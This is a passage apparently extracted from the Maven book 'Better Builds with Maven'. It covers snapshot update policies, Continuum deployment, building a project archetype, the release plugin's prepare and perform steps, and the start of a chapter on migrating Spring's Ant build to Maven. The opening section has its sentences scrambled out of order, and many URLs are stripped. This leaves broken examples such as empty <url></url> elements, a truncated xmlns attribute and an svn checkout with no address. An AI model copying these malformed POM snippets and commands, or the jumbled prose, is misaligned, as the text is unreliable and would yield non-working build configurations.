proficio-api:1. add the following configuration to the repository configuration you defined above in proficio/pom. daily (the default). always. In this example. but you can also change the interval by changing the repository configuration. This is because the default policy is to update snapshots daily – that is. To see this... without having to manually intervene. no update would be performed. and then deploy the snapshot to share with the other team members.. If it were omitted. and interval:minutes. Several of the problems mentioned earlier still exist – so at this point. This causes many plugins to be checked for updates. build proficio-core with the following command: C:\mvnbook\proficio\proficio-core> mvn -U install During the build. similar to the example below (note that this output has been abbreviated): . <repository> . assuming that the other developers have remembered to follow the process... However. making it out-of-date. by default. However. This technique can ensure that developers get regular updates. and without slowing down the build by checking on every access (as would be the case if the policy were set to always). Whenever you use the -U argument. the updates will still occur only as frequently as new versions are deployed to the repository. as well as updating any version ranges. you may also want to add this as a pluginRepository element as well. it updates both releases and snapshots. or deployed without all the updates from the SCM. to check for an update the first time that particular dependency is used after midnight local time. you will see that some of the dependencies are checked for updates..xml: .Better Builds with Maven If you are developing plugins. any snapshot dependencies will be checked once an hour to determine if there are updates in the remote repository. this introduces a risk that the snapshot will not be deployed at all. The -U argument in the prior command is required to force Maven to update all of the snapshots in the build. The settings that can be used for the update policy are never. 230 . You can always force the update using the -U command. <snapshots> <updatePolicy>interval:60</updatePolicy> </snapshots> </repository> ..0-SNAPSHOT: checking for updates from internal . to see the updated version downloaded.. all that is being saved is some time.. Now. deployed with uncommitted code. It is possible to establish a policy where developers do an update from the source control management (SCM) system before committing..
this feature is enabled by default in a build definition.\apps\ continuum\build-output-directory C:\mvnbook\repository\internal Deployment Repository Directory Base URL Mergere Company Name..\.0.mergere. so let's go ahead and do it now. Log in as an administrator and go to the following Configuration screen. However. as well. Continuum can be configured to deploy its builds to a Maven snapshot repository automatically. it makes sense to have it build snapshots.gif Company Logo.. shown in figure 7-6.com Company URL Working Directory 231 . as you saw earlier.mergere..Team Collaboration with Maven A much better way to use snapshots is to automate their creation. To deploy from your server. you can cut and paste field values from the following list: Field Name Value C:\mvnbook\continuum-1.0.com/_design/images/mergere_logo.\apps\ continuum\working-directory Build Output Directory C:\mvnbook\continuum-1.3\bin\win32\. Since the continuous integration server regularly rebuilds the code from a known state. So far in this section..3\bin\win32\. you have not been asked to apply this setting. Figure 7-6: Continuum configuration To complete the Continuum configuration page. How you implement this will depend on the continuous integration server that you use.\. you must ensure that the distributionManagement section of the POM is correctly configured. If there is a repository configured to which to deploy them.
To try this feature. when necessary. you can avoid all of the problems discussed previously. you can enter a full repository URL such as scp://repositoryhost/www/repository/internal. if you had a snapshot-only repository in /www/repository/snapshots. This will deploy to that repository whenever the version contains SNAPSHOT. with an updated time stamp and build number.snapshots</id> <url></url> </snapshotRepository> </distributionManagement> . With this setup..Better Builds with Maven The Deployment Repository Directory field entry relies on your internal repository and Continuum server being in the same location. and click Build Now on the Proficio API project.. 232 . return to your console and build proficio-core again using the following command: C:\mvnbook\proficio\proficio-core> mvn -U install You'll notice that a new version of proficio-api is downloaded.. For example. follow the Show Projects link. Once the build completes. you would add the following: . you can either lock a dependency to a particular build. If this is not the case... <distributionManagement> . This can be useful if you need to clean up snapshots on a regular interval. while you get regular updates from published binary dependencies.. Another point to note about snapshots is that it is possible to store them in a separate repository from the rest of your released artifacts. <snapshotRepository> <id>internal. and deploy to the regular repository you listed earlier. or build from source. If you are using the regular deployment mechanism (instead of using Continuum). but still keep a full archive of releases. when it doesn't. this separation is achieved by adding an additional repository to the distributionManagement section of your POM. Better yet.
There are two ways to create an archetype: one based on an existing project using mvn archetype:create-from-project.. there is always some additional configuration required. using an archetype. either in adding or removing content from that generated by the archetypes. you can make the snapshot update process more efficient by not checking the repository that has only releases for updates. Beyond the convenience of laying out a project structure instantly. by hand. run the following command: C:\mvnbook\proficio> mvn archetype:create \ -DgroupId=com.7. The replacement repository declarations in your POM would look like this: . in a way that is consistent with other projects in your environment. While this is convenient.mergere.Team Collaboration with Maven Given this configuration. To avoid this. you can create one or more of your own archetypes. To get started with the archetype. <repositories> <repository> <id>internal</id> <url></url> <snapshots> <enabled>false</enabled> </snapshots> </repository> <repository> <id>internal. you have seen the archetypes that were introduced in Chapter 2 used to quickly lay down a project structure.mvnbook \ -DartifactId=proficio-archetype \ -DarchetypeArtifactId=maven-archetype-archetype 233 . 7. As you saw in this chapter. and replacing the specific values with parameters. the requirement of achieving consistency is a key issue facing teams. archetypes give you the opportunity to start a project in the right way – that is... and the other. Writing an archetype is quite like writing your own project.snapshots</id> <url></url> <snapshots> <updatePolicy>interval:60</updatePolicy> </snapshots> </repository> </repositories> .. Creating a Standard Project Archetype Throughout this book.
you'll see that the archetype is just a normal JAR project – there is no special build configuration required. 234 . and the template project in archetype-resources.xml.java</source> </testSources> </archetype> Each tag is a list of files to process and generate in the created project.Better Builds with Maven The layout of the resulting archetype is shown in figure 7-7. testResources. so everything else is contained under src/main/resources. There are two pieces of information required: the archetype descriptor in META-INF/maven/archetype. and siteResources. Figure 7-7: Archetype directory layout If you look at pom.xml at the top level.java</source> </sources> <testSources> <source>src/test/java/AppTest. The archetype descriptor describes how to construct a new project from the archetype-resources provided. but it is also possible to specify files for resources. The example above shows the sources and test sources. The example descriptor looks like the following: <archetype> <id>proficio-archetype</id> <sources> <source>src/main/java/App. The JAR that is built is composed only of resources.
w3. a previous release would be used instead). artifactId and version elements are variables that will be substituted with the values provided by the developer running archetype:create. the required version would not be known (or if this was later development. Continuing from the example in section 7.apache. the content of the files will be populated with the values that you provided on the command line. go to an empty directory and run the following command: C:\mvnbook> mvn archetype:create -DgroupId=com. You now have the template project laid out in the proficio-example directory. However. To do so. Releasing a project is explained in section 7.apache. For this example.xsd"> <modelVersion>4.0</modelVersion> <groupId>$groupId</groupId> <artifactId>$artifactId</artifactId> <version>$version</version> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3. the archetypeVersion argument is not required at this point.org/POM/4.org/2001/XMLSchema-instance" xsi:schemaLocation=" of this chapter. since the archetype has not yet been released. 235 .mvnbook \ -DarchetypeArtifactId=proficio-archetype \ -DarchetypeVersion=1. Once you have completed the content in the archetype.0. install and deploy it like any other JAR.org/maven-v4_0_0. it has the correct deployment settings already.8.0. It will look very similar to the content of the archetype-resources directory you created earlier.0</version> <scope>test</scope> </dependency> </dependencies> </project> As you can see. From here. refer to the documentation on the Maven web site.3 of this chapter.mergere.Team Collaboration with Maven The files within the archetype-resources section are Velocity templates. the pom.mvnbook \ -DartifactId=proficio-example \ -DarchetypeGroupId=com.apache. For more information on creating an archetype. you need to populate the template with the content that you'd like to have applied consistently to new projects. now however. so you can run the following command: C:\mvnbook\proficio\proficio-archetype> mvn deploy The archetype is now ready to be used. the groupId. Since the archetype inherits the Proficio parent. Maven will build. These files will be used to generate the template files when the archetype is run.0" xmlns:xsi=". if omitted.0-SNAPSHOT Normally.0.org/POM/4. you will use the “internal” repository.xml file looks like the following: <project xmlns=".
it is usually difficult or impossible to correct mistakes other than to make another. allowing them to be highly automated. it happens at the end of a long period of development when all everyone on the team wants to do is get it out there. 236 .8. Maestro is an Apache License 2. without making any modifications to your project. The perform step could potentially be run multiple times to rebuild a release from a clean checkout of the tagged version. Continuum and Archiva build platform. you will be prompted for values. It is usually tedious and error prone.0 distribution based on a pre-integrated Maven. run the following command: c:\mvnbook\proficio> mvn release:prepare -DdryRun=true This simulates a normal release preparation. You can continue using the code that you have been working on in the previous sections. To demonstrate how the release plugin works.5 The release plugin operates in two steps: prepare and perform. full of manual steps that need to be completed in a particular order. The release plugin takes care of a number of manual steps in updating the project POM. or check out the following: C:\mvnbook> svn co \ \ proficio To start the release process. For more information on Maestro please see:. Once the definition for a release has been set by a team. Maven provides a release plugin that provides the basic functions of a standard release process. Accept the defaults in this instance (note that running Maven in “batch mode” avoids these prompts and will accept all of the defaults). new release. and to perform standard tasks. You'll notice that each of the modules in the project is considered. which often leads to omissions or short cuts. Cutting a Release Releasing software is difficult.0. Finally. Worse.mergere. such as deployment to the remote repository.com/. the Proficio example will be revisited. updating the source control management system to check and commit release related changes. As the command runs.Better Builds with Maven 7. and released as 1. once a release has been made. The prepare step is run once for a release. and does all of the project and source control manipulation that results in a tagged version. 5 Mergere Maestro provides an automated feature for performing releases. and creating tags (or equivalent for your SCM). releases should be consistent every time they are built.
the explicit version of plugins and dependencies that were used are added any settings from settings. to verify they are correct. This is because the prepare step is attempting to guarantee that the build will be reproducible in the future. 4. This can be corrected by adding the plugin definition to your POM.tag file written out to each module directory. However. In this POM. as they will be committed to the tag Run mvn clean integration-test to verify that the project will successfully build Describe other preparation goals (none are configured by default. a number of changes are made: • • • 1. including profiles from settings. or that different profiles will be applied. an error will appear.next respectively in each module directory. This contains a resolved version of the POM that Maven will use to build from if it exists. You'll notice that the version is updated in both of these files. even if the plugin is not declared in the POM. For that reason. there is also a release-pom. or part of the project. or obtained from the development repository of the Maven project) that is implied through the build life cycle. 5. not ready to be used as a part of a release. and is set based on the values for which you were prompted during the release process.xml. 6. these changes are not enough to guarantee a reproducible build – it is still possible that the plugin versions will vary. but this might include updating the metadata in your issue tracker. or creating and committing an announcement file) 8. and setting the version to the latest release (But only after verifying that your project builds correctly with that version!). if you are using a dependency that is a snapshot. all of the dependencies being used are releases. the appropriate SCM settings) Check if there are any local modifications Check for snapshots in dependency tree Check for snapshots of plugins in the build Modify all POM files in the build. and snapshots are a transient build.xml 237 . The prepare step ensures that there are no snapshots in the build. Describe the SCM commit and tag operations 9. 2. and this is reverted in the next POM. This is because you are using a locally installed snapshot of a plugin (either built yourself. To review the steps taken in this release process: Check for correct version of the plugin and POM (for example. In some cases. other than those that will be released as part of the process (that is. any active profiles are explicitly activated. named pom. However.Team Collaboration with Maven In this project.xml (both per-user and per-installation) are incorporated into the POM. you may encounter a plugin snapshot.xml.tag and pom. Describe the SCM commit operation You might like to review the POM files that are created for steps 5 and 9. as they will be committed for the next development iteration 10. 3.xml and profiles. that resulting version ranges will be different. Modify all POM files in the build. other modules).xml. 7. The SCM information is also updated in the tag POM to reflect where it will reside once it is tagged.
Recall from Chapter 6 that you learned how to configure a number of checks – so it is important to verify that they hold as part of the release. the release still hasn't been generated yet – for that. Also. while locally.xml in the same directory as pom.5. you need to enable this profile during the verification step. use the following plugin configuration: [.apache. However. To include these checks as part of the release process. This is used by Maven.properties file that was created at the end of the last run.] <plugin> <groupId>org. this file will be release-pom. If you need to start from the beginning. Having run through this process you may have noticed that only the unit and integration tests were run as part of the test build. you can remove that file. you'll see in your SCM the new tag for the project (with the modified files). instead of the normal POM. Once this is complete.1-SNAPSHOT. This is not the case however. the version is now 1. and the updated POM files are committed.. the release plugin will resume a previous attempt by reading the release. as these can be established from the other settings already populated in the POM in a reproducible fashion.. when a build is run from this tag to ensure it matches the same circumstances as the release build. This is achieved with the release:perform goal.] Try the dry run again: C:\mvnbook\proficio> mvn release:prepare -DdryRun=true Now that you've gone through the test run and are happy with the results. or run mvn -Dresume=false release:prepare instead. To do so. When the final run is executed. you can go for the real thing with the following command: C:\mvnbook\proficio> mvn release:prepare You'll notice that this time the operations on the SCM are actually performed.. you need to deploy the build artifacts.xml. You won't be prompted for values as you were the first time – since by the default..maven. This is run as follows: C:\mvnbook\proficio> mvn release:perform 238 .Better Builds with Maven You may have expected that inheritance would have been resolved by incorporating any parent elements that are used. recall that in section 7. or that expressions would have been resolved. you created a profile to enable those checks conditionally.plugins</groupId> <artifactId>maven-release-plugin</artifactId> <configuration> <arguments>-DenableCiProfile=true</arguments> </configuration> </plugin> [.
check out the tag: C:\mvnbook> svn co \. the release plugin will confirm that the checked out project has the same release plugin configuration as those being used (with the exception of goals). before you run the release:prepare goal. It is important in these cases that you consider the settings you want. both the original pom. you want to avoid such problems. this requires that you remember to add the parameter every time.xml file.apache.xml file. add the following goals to the POM: [. and the built artifacts are deployed. you'll see that a clean checkout was obtained from the created tag. during the process you will have noticed that Javadoc and source JAR files were produced and deployed into the repository for all the Java projects. it is necessary to know what version ranges are allowed for a dependency. you can examine the files that are placed in the SCM repository. These are configured by default in the Maven POM as part of a profile that is activated when the release is performed.. When the release is performed..org/plugins/maven-release-plugin/ for more information. you would run the following: C:\mvnbook\proficio> mvn release:perform -DconnectionUrl=\ scm:svn: Collaboration with Maven No special arguments are required. To release from an older version. rather than the specific version used for the release. To do so. because the release.0 If you follow the output above. and to deploy a copy of the site.apache.maven.properties file had been removed.plugins</groupId> <artifactId>maven-release-plugin</artifactId> <configuration> <goals>deploy</goals> </configuration> </plugin> [.0 You'll notice that the contents of the POM match the pom.properties file still exists to tell the goal the version from which to release. To ensure reproducibility.] You may also want to configure the release plugin to activate particular profiles. For the same reason.. If this is not what you want to run. Refer to the plugin reference at. you can change the goals used with the goals parameter: C:\mvnbook\proficio> mvn release:perform -Dgoals="deploy" However. Also. Since the goal is for consistency. This is the default for the release plugin – to deploy all of the built artifacts. The reason for this is that the POM files in the repository are used as dependencies and the original information is more important than the release-time information – for example. before running Maven from that location with the goals deploy site-deploy. 239 . and not the release-pom.. or if the release.xml file and the release-pom. or to set certain properties.] <plugin> <groupId>org. though.xml files are included in the generated JAR file. To do this.
without having to declare and enable an additional profile.properties and any POM files generated as a result of the dry run.9. removing release. All of the features described in this chapter can be used by any development team... And all of these features build on the essentials demonstrated in chapters 1 and 2 that facilitate consistent builds. by making information about your projects visible and organized. define a profile with the identifier release-profile. real-time engineering style. Maven provides value by standardizing and automating the build process.maven. the only step left is to clean up after the plugin. as follows: [.Better Builds with Maven You can disable this profile by setting the useReleaseProfile parameter to false. and indeed this entire book.. The site and reports you've created can help a team communicate the status of a project and their work more effectively. 240 .] Instead. This in turn can lead to and facilitate best practices for developing in a community-oriented.apache. it can aid you in effectively using tools to achieve consistency in other areas of your development.Extra plugin configuration would be inserted here --> </build> </profile> </profiles> [.] After the release process is complete.. Simply run the following command to clean up: C:\mvnbook\proficio> mvn release:clean 7. the adoption of reusable plugins can capture and extend build knowledge throughout your entire organization. and while Maven focuses on delivering consistency in your build infrastructure through patterns.. To do this. Lack of consistency is the source of many problems when working in a team.. whether your team is large or small..plugins</groupId> <artifactId>maven-release-plugin</artifactId> <configuration> <useReleaseProfile>false</useReleaseProfile> </configuration> </plugin> [. as follows: [.] <plugin> <groupId>org.] <profiles> <profile> <id>release-profile</id> <build> <!-.. Maven was designed to address issues that directly affect teams of developers. Summary As you've seen throughout this chapter. you may want to include additional actions in the profile. So. There are also strong team-related benefits in the preceding chapters – for example. rather than creating silos of information around individual projects.
.8.you stay in Wonderland and I show you how deep the rabbit-hole goes. After this.the story ends. You take the blue pill . The Matrix 241 . using both Java 1. to a build in Maven: • • • • • Splitting existing sources and resources into modular Maven projects Taking advantage of Maven's inheritance and multi-project capabilities Compiling. You take the red pill . Migrating to Maven Migrating to Maven This chapter explains how to migrate (convert) an existing build in Ant. testing and building jars with Maven. there is no turning back. you wake up in your bed and believe whatever you want to believe.Morpheus.4 and Java 5 Using Ant tasks from within Maven Using Maven with your current directory structure This is your last chance.
recommended Maven directory structure). which is the latest version at the time of writing. while still running your existing. how to split your sources into modules or components. and among other things. You will learn how to start building with Maven. For the purpose of this example.1. The Spring release is composed of several modules. you will be introduced to the concept of dependencies. Introduction The purpose of this chapter is to show a migration path from an existing build in Ant to Maven. which uses an Ant script.1.0-m1 of Spring. while enabling you to continue with your required work. This example will take you through the step-by-step process of migrating Spring to a modularized. You will learn how to use an existing directory structure (though you will not be following the standard.Better Builds with Maven 8. 8. This will allow you to evaluate Maven's technology. . Maven build. The Maven migration example is based on the Spring Framework build. Ant-based build system. we will focus only on building version 2. component-based. Introducing the Spring Framework The Spring Framework is one of today's most popular Java frameworks.1. how to run Ant tasks from within Maven.
the Ant script compiles each of these different source directories and then creates a JAR for each module. you can see graphically the dependencies between the modules. These modules are built with an Ant script from the following source directories: • • src and test: contain JDK 1. The src and tiger/src directories are compiled to the same destination as the test and tiger/test directories. and each produces a JAR. using inclusions and exclusions that are based on the Java packages of each class. resulting in JARs that contain both 1. Each of these modules corresponds. TLD files.).4 and 1. Optional dependencies are indicated by dotted lines. with the Java package structure. 243 .Migrating to Maven Figure 8-1: Dependency relationship between Spring modules In figure 8-1.5 classes. more or less. properties files. For Spring. etc.
) per Maven project file. WAR. etc. the rule of thumb to use is to produce one artifact (JAR. that means you will need to have a Maven project (a POM) for each of the modules listed above. Inside the 'm2' directory.Better Builds with Maven 8. Where to Begin? With Maven. To start. you will need to create a directory for each of Spring's modules. you will create a subdirectory called 'm2' to keep all the necessary Maven changes clearly separated from the current build system. Figure 8-2: A sample spring module directory 244 . In the Spring example.2.
war. in Spring. spring-parent) • version: this setting should always represent the next release version number appended with .org</url> <organization> <name>The Spring Framework Project</name> </organization> In this parent POM we can also add dependencies such as JUnit. <groupId>com. Recall from previous chapters that during the release process. the main source and test directories are src and test. and ear values should be obvious to you (a pom value means that this project is used for metadata only) The other values are not strictly required.m2book. primary used for documentation purposes. <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3. however. which will be used for testing in every module. For this example.Migrating to Maven In the m2 directory.migrating</groupId> <artifactId>spring-parent</artifactId> <version>2. company.0-m1-SNAPSHOT</version> <name>Spring parent</name> <packaging>pom</packaging> <description>Spring Framework</description> <inceptionYear>2002</inceptionYear> <url>. in order to tag the release in your SCM.springframework. respectively. non-snapshot version for a short period of time. you will use com. each module will inherit the following values (settings) from the parent POM. the Spring team would use org. you will need to create a parent POM. 245 . • packaging: the jar. and it should mimic standard package naming conventions to avoid duplicate values. etc. • groupId: this setting indicates your area of influence. You will use the parent POM to store the common configuration settings that apply to all of the modules. as it is our 'unofficial' example version of Spring.mergere..mergere.springframework • artifactId: the setting specifies the name of this module (for example. the version you are developing in order to release.SNAPSHOT – that is.8. Let's begin with these directories. thereby eliminating the requirement to specify the dependency repeatedly across multiple modules.migrating. For example. project. Maven will convert to the definitive.m2book. department.1</version> <scope>test</scope> </dependency> </dependencies> As explained previously.
Include Commons Attributes generated Java sources --> <src path="${commons.tempdir. you will need to append -Dmaven./test</testSourceDirectory> <plugins> <plugin> <groupId>org. Recall from Chapter 2./.3" debug="${debug}" deprecation="false" optimize="false" failonerror="true"> <src path="${src./. your build section will look like this: <build> <sourceDirectory>. deprecation and optimize (false).debug=false to the mvn command (by default this is set to true).classes. and failonerror (true) values. For the debug attribute.attributes.dir}" source="1./src</sourceDirectory> <testSourceDirectory>..dir}"/> <!-. At this point.maven.3)..apache.3</source> <target>1. you can retrieve some of the configuration parameters for the compiler.3</target> </configuration> </plugin> </plugins> </build> 246 .Better Builds with Maven Using the following code snippet from Spring's Ant build script. that Maven automatically manages the classpath from its list of dependencies..3" target="1. For now. you don't have to worry about the commons-attributes generated sources mentioned in the snippet.compiler. <javac destdir="${target. so to specify the required debug function in Maven.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <configuration> <source>1..src}"/> <classpath refid="all-libs"/> </javac> As you can see these include the source and target compatibility (1. as you will learn about that later in this chapter. These last three properties use Maven's default values. Spring's Ant script uses a debug parameter. so there is no need for you to add the configuration parameters. in the buildmain target.
excludes}"/> </batchtest> </junit> You can extract some configuration information from the previous code: • forkMode=”perBatch” matches with Maven's forkMode parameter with a value of once.testclasses. Maven sets the reports destination directory (todir) to target/surefire-reports.dir}"> <fileset dir="${target.properties files etc take precedence --> <classpath location="${target. haltonfailure and haltonerror settings. this value is read from the project.includes}" excludes="${test. You will need to specify the value of the properties test.includes and test. • • formatter elements are not required as Maven generates both plain text and xml reports.mockclasses.properties file loaded from the Ant script (refer to the code snippet below for details). and this doesn't need to be changed.awt.Must go first to ensure any jndi.dir}" includes="${test. so you will not need to locate the test classes directory (dir). by default.headless=true -XX:MaxPermSize=128m -Xmx128m"/> <!-. You will not need any printsummary. as Maven prints the test summary and stops for any test error or failure.excludes from the nested fileset. Maven uses the default value from the compiler plugin. From the tests target in the Ant script: <junit forkmode="perBatch" printsummary="yes" haltonfailure="yes" haltonerror="yes"> <jvmarg line="-Djava. • • • • • 247 . classpath is automatically managed by Maven from the list of dependencies.Need files loaded as resources --> <classpath location="${test. since the concept of a batch for testing does not exist.testclasses. by default.Migrating to Maven The other configuration that will be shared is related to the JUnit tests.classes.dir}"/> <classpath location="${target.dir}"/> <!-.dir}"/> <classpath location="${target. The nested element jvmarg is mapped to the configuration parameter argLine As previously noted.dir}"/> <classpath refid="all-libs"/> <formatter type="plain" usefile="false"/> <formatter type="xml"/> <batchtest fork="yes" todir="${reports.
plugins</groupId> <artifactId>maven-surefire-plugin</artifactId> <configuration> <forkMode>once</forkMode> <childDelegation>false</childDelegation> <argLine> -Djava. 248 .4 to run you do not need to exclude hibernate3 tests. <plugin> <groupId>org. # Convention is that our JUnit test classes have XXXTests-style names.includes=**/*Tests. # Second exclude needs to be used for JDK. test.class</include> </includes> <excludes> <exclude>**/Abstract*</exclude> </excludes> </configuration> </plugin> The childDelegation option is required to prevent conflicts when running under Java 5 between the XML parser provided by the JDK and the one included in the dependencies in some modules.maven.headless=true -XX:MaxPermSize=128m -Xmx128m </argLine> <includes> <include>**/*Tests.4. Note that it is possible to use another lower JVM to run tests if you wish – refer to the Surefire plugin reference documentation for more information. It makes tests run using the standard classloader delegation instead of the default Maven isolated classloader. which are processed prior to the compilation.apache.excludes=**/Abstract* org/springframework/orm/hibernate3/** The includes and excludes referenced above.1 # being compiled with target JDK 1.5 . due to Hibernate 3. test.class # # Wildcards to exclude among JUnit tests. mandatory when building in JDK 1.excludes=**/Abstract* #test. Since Maven requires JDK 1.4.and generates sources from them that have to be compiled with the normal Java compiler. When building only on Java 5 you could remove that option and the XML parser (Xerces) and APIs (xml-apis) dependencies.awt. Spring's Ant build script also makes use of the commons-attributes compiler in its compileattr and compiletestattr targets.
servlet.mojo</groupId> <artifactId>commons-attributes-maven-plugin</artifactId> <executions> <execution> <configuration> <includes> <include>**/metadata/*.codehaus.attributes. 249 .attributes.web.Compile to a temp directory: Commons Attributes will place Java Source here.java</include> <include>org/springframework/jmx/**/*. Maven handles the source and destination directories automatically. --> <attribute-compiler <fileset dir="${test.Compile to a temp directory: Commons Attributes will place Java Source here.dir}" includes="**/metadata/*.java"/> </attribute-compiler> From compiletestattr: <!-.test}"> <fileset dir="${test. --> <fileset dir="${src. --> <attribute-compiler </attribute-compiler> In Maven. this same function can be accomplished by adding the commons-attributes plugin to the build section in the POM.dir}" includes="org/springframework/aop/**/*.tempdir.java</include> </testIncludes> </configuration> <goals> <goal>compile</goal> <goal>test-compile</goal> </goals> </execution> </executions> </plugin> Later in this chapter you will need to modify these test configurations.dir}" includes="org/springframework/jmx/**/*.src}"> <!-Only the PathMap attribute in the org.Migrating to Maven From compileattr: <!-.java</include> </includes> <testIncludes> <include>org/springframework/aop/**/*.springframework.metadata package currently needs to be shipped with an attribute.handler.
0-m1-SNAPSHOT</version> </parent> <artifactId>spring-core</artifactId> <name>Spring core</name> Again.dir}"> <include name="org/springframework/core/**"/> <include name="org/springframework/util/**"/> </fileset> <manifest> <attribute name="Implementation-Title" value="${spring-title}"/> <attribute name="Implementation-Version" value="${spring-version}"/> <attribute name="Spring-Version" value="${spring-version}"/> </manifest> </jar> From the previous code snippet. As you saw before.mergere. compiler configuration. In each subdirectory. Compiling In this section. which centralizes and maintains information common to the project.3.). since the sources and resources are in the same directory in the current Spring build. However. The following is the POM for the spring-core module. you will start to compile the main Spring source. description. For the resources. in this case the defaults are sufficient. you will need to add a resources element in the build section.dir}/modules/spring-core.jar"> <fileset dir="${target. you need to create the POM files for each of Spring's modules.classes.java files from the resources. and organization name to the values in the POM. 8. JUnit test configuration. Maven will automatically set manifest attributes such as name. tests will be dealt with later in the chapter.m2book.migrating</groupId> <artifactId>spring-parent</artifactId> <version>2. or they will get included in the JAR. you will need to create a POM that extends the parent POM. 250 . setting the files you want to include (by default Maven will pick everything from the resource directory). review the following code snippet from Spring's Ant script. you will need to exclude the *. as those values are inherited from parent POM. <parent> <groupId>com.4.Better Builds with Maven 8. you can determine which classes are included in the JAR and what attributes are written into the JAR's manifest. etc. While manifest entries can also be customized with additional configuration to the JAR plugin. Creating POM files Now that you have the basic configuration shared by all modules (project information. This module is the best to begin with because all of the other modules depend on it. you won't need to specify the version or groupId elements of the current module. To begin. version. where spring-core JAR is created: <jar jarfile="${dist. you will need to tell Maven to pick the correct classes and resources from the core and util packages.
Maven will by default compile everything from the source directory./src</directory> <includes> <include>org/springframework/core/**</include> <include>org/springframework/util/**</include> </includes> <excludes> <exclude>**/*.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <configuration> <includes> <include>org/springframework/core/**</include> <include>org/springframework/util/**</include> </includes> </configuration> </plugin> </plugins> </build> 251 . <build> <resources> <resource> <directory>. you will need to configure the compiler plugin to include only those in the core and util packages.Migrating to Maven For the classes.apache.java</exclude> </excludes> </resource> </resources> <plugins> <plugin> <groupId>org./.maven. because as with resources.. which is inherited from the parent POM..
As an alternative. you now know that you need the Apache Commons Logging library (commons-logging) to be added to the dependencies section in the POM.java:[31. But.commons.\. Specify site:www. beginning with the following: [INFO] -----------------------------------------------------------------------[ERROR] BUILD FAILURE [INFO] -----------------------------------------------------------------------[INFO] Compilation failure C:\dev\m2book\code\migrating\spring\m2\springcore\. you can search the repository using Google.commons.\.24] cannot find symbol symbol : class Log location: class org.apache.ibiblio. From the previous output.core.apache. Regarding the artifactId..\src\org\springframework\core\io\support\PathMatchingResourcePatternResol ver. In the case of commons-logging..apache.34] package org.34] package org. located in the org/apache/commons/logging directory in the repository.apache.org/maven2/commons-logging/commons-logging/.java:[107.. 252 .springframework. you need to check the central repository at ibiblio. what groupid.logging does not exist C:\dev\m2book\code\migrating\spring\m2\springcore\. the convention is to use a groupId that mirrors the package name.logging. You will see a long list of compilation failures. commons-logging groupId would become org.org/maven2 commons logging.support.Better Builds with Maven To compile your Spring build.java:[19.\src\org\springframework\util\xml\SimpleSaxErrorHandler. If you check the repository.commons. for historical reasons some groupId values don't follow this convention and use only the name of the project.logging does not exist C:\dev\m2book\code\migrating\spring\m2\springcore\.ibiblio.34] package org. the option that is closest to what is required by your project.logging does not exist These are typical compiler messages.java:[30. Typically. artifactId and version should we use? For the groupId and artifactId. it's usually the JAR name without a version (in this case commonslogging). caused by the required classes not being on the classpath...io.\src\org\springframework\core\io\support\PathMatchingResourcePatternResol ver.. you can now run mvn compile.\.. you will find all the available versions of commons-logging under. and then choose from the search results.PathMatchingResourcePatternResolver C:\dev\m2book\code\migrating\spring\m2\springcore\.. For example. changing dots to slashes.\src\org\springframework\core\io\support\PathMatchingResourcePatternResol ver. the actual groupId is commons-logging. However.\.commons.
ibiblio. 253 .0.1. So.com/. However. search the ibiblio repository through Google by calculating the MD5 checksum of the JAR file with a program such as md5sum. Continuum and Archiva build platform.jar.org/maven2 to the query. we strongly encourage and recommend that you invest the time at the outset of your migration. component-oriented. to make explicit the dependencies and interrelationships of your projects. For instance.0 distribution based on a preintegrated Maven. we discovered that the commons-beanutils version stated in the documentation is wrong and that some required dependencies are missing from the documentation. you will find that there is documentation for all of Spring's dependencies in readme. has been developed and is available as part of Maestro.txt in the lib directory of the Spring source.ibiblio. there are some other options to try to determine the appropriate versions for the dependencies included in your build: • Check if the JAR has the version in the file name • Open the JAR file and look in the manifest file META-INF/MANIFEST. you could search with: site:). all submodules would use the same dependencies). and then search in Google prepending site:www. the previous directory is the artifactId (hibernate) and the other directories compose the groupId. you have to be careful as the documentation may contain mistakes and/or inaccuracies.Migrating to Maven With regard the version. with the slashes changed to dots (org.MF • For advanced users. using a Web interface. through inheritance. although you could simply follow the same behavior used in Ant (by adding all the dependencies in the parent POM so that. You can use this as a reference to determine the versions of each of the dependencies. For more information on Maestro please see:. explicit dependency management is one of the biggest benefits of Maven once you have invested the effort upfront. When needed. Maestro is an Apache License 2.hibernate) An easier way to search for dependencies. <dependencies> <dependency> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> <version>1. For example. during the process of migrating Spring to Maven.ibiblio.md5 You can see that the last directory is the version (3. For details on Maven Archiva (the artifact repository manager) refer to the Maven Archiva project for details)6. 6 Maven Archiva is part of Mergere Maestro. modular projects that are easier to maintain in the long term. for the hibernate3.org/maven2 78d5c38f1415efc64f7498f828d8069a The search will return: provided with Spring under lib/hibernate. Doing so will result in cleaner.1/hibernate-3. While adding dependencies can be the most painful part of migrating to Maven.org/maven2/org/hibernate/hibernate/3.4</version> </dependency> </dependencies> Usually you will convert your own project. so you will have first hand knowledge about the dependencies and versions used.mergere.
5.this time all of the sources for spring-core will compile. we will cover how to run the tests.Better Builds with Maven Running again mvn compile and repeating the process previously outlined for commons-logging. Compiling Tests Setting the test resources is identical to setting the main resources.. <testResources> <testResource> <directory>. 8.1</version> </dependency> <dependency> <groupId>log4j</groupId> <artifactId>log4j</artifactId> <version>1. Now. setting which test resources to use. <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3. with the exception of changing the location from which the element name and directory are pulled.java</exclude> </excludes> </testResource> </testResources> 254 .properties file required for logging configuration. so log4j will not be included in other projects that depend on this.9</version> <optional>true</optional> </dependency> Notice that log4j is marked as optional.5. and setting the JUnit test sources to compile. Optional dependencies are not included transitively. After compiling the tests. 8. and it is just for the convenience of the users.2. Using the optional tag does not affect the current project. you may decide to use another log implementation. For the first step./test</directory> <includes> <include>log4j.1. Testing Now you're ready to compile and run the tests. run mvn compile again . you will repeat the previous procedure for the main classes./. This is because in other projects.properties</include> <include>org/springframework/core/**</include> <include>org/springframework/util/**</include> </includes> <excludes> <exclude>**/*. you will need to add the log4j.. you will notice that you also need Apache Commons Collections (aka commons-collections) and log4j. In addition.
